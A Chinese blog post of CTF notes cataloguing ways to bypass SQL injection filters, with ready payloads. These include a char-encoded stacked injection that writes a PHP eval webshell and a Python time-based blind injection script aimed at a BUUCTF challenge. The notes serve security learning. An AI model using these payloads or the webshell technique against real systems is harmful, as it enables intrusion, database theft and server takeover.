Ctfer-Sql注入从0.1到0.2

Sql注入绕过总结

1.空格绕过:

(1)用/**/替代空格 (最常用)

(2)两个空格代替一共空格(双写绕过)

(3)可以用括号包裹语句 如:

   ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema="geek")),1,1))=100

2.or绕过:

(1)不能使用order by 可以改为使用 group by替代

(2)不能使用information_schema ,参考使用无列名盲注(后续会提到)

3.引号绕过:

一般用到引号都是在where子句之后,这时候就只能使用16进制 比如

select column_name  from information_schema.tables where table_name="users"#

改为:
select column_name  from information_schema.tables where table_name=0x7573657273(为users的16进制字符串)

4.逗号绕过:

(1):  

   union select 1,2
   #等价于
   union select * from (select 1)a join (select 2)b

(经测试可以使用,如果不是两列 可以继续join连接)

(2):还有其他用法见ppt

5.绕过注释符

当结尾不能使用#号或者--+,闭合多余的引号时,有3种方法:

(1).可以进行与运算 &&‘1’=‘1(好像不行)

(2).用查询的最后一列来闭合select 1,2,’3 (可以)

6.绕过union select where等

(1)使用注释符绕过:  

常用注释符://,-- , /**/, #, --+, -- -, ; , %00 , --a
   U/**/ NION /**/ SE/**/ LECT /**/user,pwd from user

(2)使用大小写绕过:

   id=-1'UnIoN/**/SeLeCT

(3)双写绕过:

   id=-1'UNIunionONSeLselectECT1,2,3--

(4)内联注释绕过:

   id=-1'/*!UnIoN*/ SeLeCT 1,2,concat(/*!table_name*/) FrOM /*!information_schema*/.tables /*!WHERE *//*!TaBlE_ScHeMa*/ like database()#
   #/*! 不紧跟版本号时,里面的内容会被当成 SQL 语句解析执行(默认)

7.可以堆叠注入时利用char绕过字符

参考SUCTF 2018 Multisql

想要注入的命令为

   select '<?php eval($_POST[_]);?>' into outfile '/var/www/html/favicon/shell.php';

编写python脚本将注入命令转化成十进制形式:

   char(115,101,108,101,99,116,32,39,60,63,112,104,112,32,101,118,97,108,40,

36,95,80,79,83,84,91,95,93,41,59,63,62,39,32,105,110,116,111,32,111,117,116,

102,105,108,101,32,39,47,118,97,114,47,119,119,119,47,104,116,109,108,47,

102,97,118,105,99,111,110,47,115,104,101,108,108,46,112,104,112,39,59)

注入payload:

   ?id=2;set @sql=char(115,101,108,101,99,116,32,39,60,63,112,104,112,32,101,118,97,

108,40,36,95,80,79,83,84,91,95,93,41,59,63,62,39,32,105,110,116,111,32,111,117,116,

102,105,108,101,32,39,47,118,97,114,47,119,119,119,47,104,116,109,108,47,102,97,

118,105,99,111,110,47,115,104,101,108,108,46,112,104,112,39,59);prepare query from @sql;execute query;

8.堆叠注入时利用十六进制绕过字符过滤

mysql可以识别16进制,因此可以将命令转为16进制后绕过关键字过滤

参考SWPU2019 Web4

通过mysql预处理与hex绕过过滤的参考脚本

import requests
import json
import time
def main():
    url='''http://26a14761-8c46-43ab-a339-3d0c980a4439.node4.buuoj.cn:81/index.php?r=Login/Login'''
    payloads = "asd';set @a=0x{0};prepare ctftest from @a;execute ctftest;"
    flag = ''
    for i in range(1, 30):
        # 查询payload
        payload = "select if(ascii(substr((select flag from flag),{0},1))={1},sleep(3),1)"
        for j in range(32, 128):
            # 将构造好的payload进行16进制转码和json转码
            datas = {'username': payloads.format(str_to_hex(
                payload.format(i, j))), 'password': 'test213'}
            data = json.dumps(datas)
            times = time.time()
            try:
                res = requests.post(url=url, data=data, timeout=2)
                res.raise_for_status()
                time.sleep(0.5)
            except requests.exceptions.Timeout:
                flag = flag + chr(j)
                print(i,end="\n")
                print(flag)
                break
            except requests.HTTPError:
                print(i,j,res.status_code) #buuctf频繁访问会返回429错误
def str_to_hex(s):
    return ''.join([hex(ord(c)).replace('0x', '') for c in s])
if __name__ == '__main__':
    main()

 

posted @ 2024-02-01 17:35  Heck1ng  阅读(150)  评论(0)    收藏  举报